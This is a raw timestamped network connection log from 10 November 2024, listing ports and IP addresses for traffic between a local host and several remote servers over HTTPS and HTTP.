Nov 10, 2024 04:55:22.130412102 CET	443	49810	23.218.232.185	192.168.2.5
Nov 10, 2024 04:55:22.130511045 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.130573988 CET	49810	443	192.168.2.5	23.218.232.185
Nov 10, 2024 04:55:22.130894899 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.130930901 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.130954027 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.131433964 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.131458998 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:22.131603956 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.131611109 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:22.131674051 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.131674051 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.132677078 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:22.132699013 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:22.132777929 CET	49810	443	192.168.2.5	23.218.232.185
Nov 10, 2024 04:55:22.132786989 CET	443	49810	23.218.232.185	192.168.2.5
Nov 10, 2024 04:55:22.133879900 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.133891106 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:22.134035110 CET	49812	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:22.134042978 CET	443	49812	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:22.193502903 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.193852901 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.193872929 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.194195032 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.195286036 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.195358038 CET	443	49803	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.197289944 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.197511911 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.197525978 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.197803974 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.198673964 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.198728085 CET	443	49804	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.214440107 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.217564106 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.217580080 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.218584061 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.218667030 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.218895912 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.218959093 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.230269909 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.233738899 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.233747959 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.234733105 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.234870911 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.235241890 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.235301971 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.250385046 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.251199007 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.251207113 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.251668930 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.251672983 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.258069038 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.258080006 CET	443	49796	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.258090019 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.258096933 CET	49804	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.258099079 CET	49803	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.258104086 CET	443	49797	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.274017096 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.282943010 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.286725044 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.286736012 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.287513971 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.287518978 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.293143034 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.293154955 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.293450117 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.293957949 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.293962955 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.294555902 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.294563055 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.295252085 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.295257092 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.367585897 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.367589951 CET	49797	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.367593050 CET	443	49806	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.374803066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.374814034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.374857903 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.374928951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375008106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375010967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375055075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375066042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375076056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375088930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375088930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375119925 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375155926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375323057 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375334024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375344038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375365973 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375386000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.375637054 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.375706911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.379395962 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.379508018 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.379687071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.379698992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.379709005 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.379751921 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.379754066 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.379796028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.379856110 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.379863977 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.379872084 CET	49798	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.379875898 CET	443	49798	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.385478973 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.385510921 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.385592937 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.386538029 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.386554003 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.393773079 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.393784046 CET	443	49805	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.393814087 CET	49796	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.400768995 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.401549101 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.401556969 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.402497053 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.402502060 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.413783073 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.418025970 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.420073032 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.420084953 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.420218945 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.420231104 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.420542955 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.421003103 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.421066046 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.421099901 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.421154976 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.421184063 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.421231031 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.421432018 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.421446085 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.421456099 CET	49802	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.421461105 CET	443	49802	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.426150084 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.426212072 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.426517010 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.426671982 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.426717043 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.426811934 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.426893950 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.442465067 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.442476034 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.442490101 CET	49799	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.442495108 CET	443	49799	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.443253994 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.443267107 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.443331957 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.443708897 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.443721056 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.443785906 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.444559097 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.444566011 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.444645882 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.444753885 CET	49816	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.444765091 CET	443	49816	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.444885015 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.444895029 CET	443	49817	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.445226908 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:22.445235968 CET	443	49818	23.221.22.207	192.168.2.5
Nov 10, 2024 04:55:22.450488091 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.450527906 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.450589895 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.451256990 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.451266050 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.451431990 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.451445103 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.451472044 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.451540947 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.451550007 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.491399050 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.509491920 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.509567022 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.509618044 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.509752989 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.509766102 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.509777069 CET	49801	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.509780884 CET	443	49801	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.514252901 CET	49805	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.514280081 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.514286995 CET	443	49807	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.515737057 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.515746117 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.515805960 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.516020060 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.516027927 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.529505968 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.529647112 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.529779911 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.530874014 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.530884027 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.530891895 CET	49800	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.530900955 CET	443	49800	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.532957077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.532978058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.532990932 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533049107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533049107 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533117056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533130884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533178091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533178091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533180952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533193111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533204079 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533217907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533227921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533227921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533232927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.533257961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533257961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533305883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.533962011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534008980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534022093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534039021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534071922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534071922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534123898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534195900 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534209967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534220934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534233093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534245968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534255028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534259081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534295082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534326077 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.534430981 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.534456015 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.534539938 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.534934044 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:22.534946918 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:22.534954071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534984112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.534997940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.535008907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.535016060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.535016060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.535022020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.535048962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.535048962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.570554018 CET	49806	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.570585966 CET	49808	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.570599079 CET	443	49808	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:22.603198051 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.603357077 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.604437113 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.604444981 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.604454994 CET	49792	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:22.604459047 CET	443	49792	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:22.648691893 CET	49807	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:22.649811983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.649869919 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690555096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690622091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690635920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690660000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690659046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690659046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690670967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690682888 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690684080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690720081 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690747023 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690892935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690942049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690962076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.690984011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.690988064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691046953 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691057920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691068888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691092014 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691133022 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691310883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691327095 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691337109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691360950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691379070 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691524029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691567898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691581964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691596031 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691605091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691615105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691623926 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.691626072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.691662073 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692024946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692054033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692065954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692079067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692095995 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692106009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692107916 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692117929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692130089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692140102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692152977 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692153931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692153931 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692198992 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692209959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.692970991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692981958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.692991972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693018913 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693030119 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693046093 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693059921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693062067 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693070889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693080902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693092108 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693150997 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693656921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693666935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693677902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693691015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693700075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693702936 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.693720102 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.693747044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.697659016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.697669029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.697707891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.697735071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.697746038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.697760105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:22.697808981 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.697808981 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:22.750926971 CET	443	49810	23.218.232.185	192.168.2.5
Nov 10, 2024 04:55:22.751122952 CET	49810	443	192.168.2.5	23.218.232.185
Nov 10, 2024 04:55:22.751132965 CET	443	49810	23.218.232.185	192.168.2.5
Nov 10, 2024 04:55:22.752094030 CET	443	49810	23.218.232.185	192.168.2.5
Nov 10, 2024 04:55:22.752152920 CET	49810	443	192.168.2.5	23.218.232.185
